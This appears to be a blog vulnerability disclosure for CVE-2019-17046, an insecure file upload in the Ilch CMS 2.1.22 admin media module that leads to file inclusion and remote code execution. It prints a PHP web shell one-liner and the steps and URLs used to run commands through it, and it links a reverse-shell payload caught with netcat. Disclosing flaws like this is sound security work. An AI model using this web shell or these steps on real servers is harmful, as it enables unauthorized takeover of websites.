[CVE-2019-17046] Ilch – Content Management System V – 2.1.22 Insecure File Upload, LFI & Remote Code Execution Critical Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID – CVE-2019-17046 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17046 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS 2.1.22

Severity: Critical

Authentication: Required

Complexity: Complex

Vulnerability Name: Insecure File upload and Local file inclusion to remote code execution – Ilch CMS Admin Modules

Vulnerability Explanation: 

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Impact:

Local File Inclusion – aka LFI – is one of the most common Web Application vulnerabilities. If conducted successfully, It might allow attackers to read sensitive information, access configuration files or even execute system commands remotely.

An application is vulnerable every time a developer uses the include functions, with an input provided by a user, without validating it. An attacker could easily exploit such a mistake. The main goals of the attacker would be:

  • An in depth information gathering (user enumeration, sensitive files, credentials and more).
  • A reverse shell to the target machine.

Log Poisoning:

Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log.

As the PHP statement “include” also evaluates the input, an inclusion of a malformed file would be evaluated too. If we control the contents of a file available on the vulnerable web application, we could insert PHP code and load the file over the LFI vulnerability to execute our code.Such injections were taking place over the server log files. Such files are the Apache error log, the Access log and more.

Php info:

As shown, we were able to load the PHPInfo file, meaning that our code was executed. Let’s now attempt to execute the proper commands and receive a reverse shell from the target machine.

For the following Php-oneliner payload to execute system commands:

<?php echo shell_exec($_GET[‘e’].’ 2>&1′); ?>

LFI: Local File Inclusion using insecure file upload

Insecure file upload – Allows to add .php extension in the allowed file section (Media module -> settings -> Allowed File -> php

url : http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

Shell.php

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=whoami

Ipconfig:

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=ipconfig

Reverse shell:    

Using netcat we can gain reverse shell payload.

Revershell payload used:

Payload – https://github.com/Dhayalanb/windows-php-reverse-shell.git

Remote Code Execution: Remote code execution is the ability an attacker has to access someone else’s computing device and make changes, no matter where the device is geographically located

By listening on port 1234 we can see that a Admin shell has been received.

Affected url :

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/index/index

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

InSecure File to LFI to RCE – Ilch CMS – V 2.1.22

Twitter – https://twitter.com/the_pr0fess0r_

NickName: 4n4nd

1 thought on “[CVE-2019-17046] Ilch – Content Management System V – 2.1.22 Insecure File Upload, LFI & Remote Code Execution Critical Vulnerability disclosure

  1. Pingback: Vulnerability Summary for the Week of September 30, 2019 | a

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s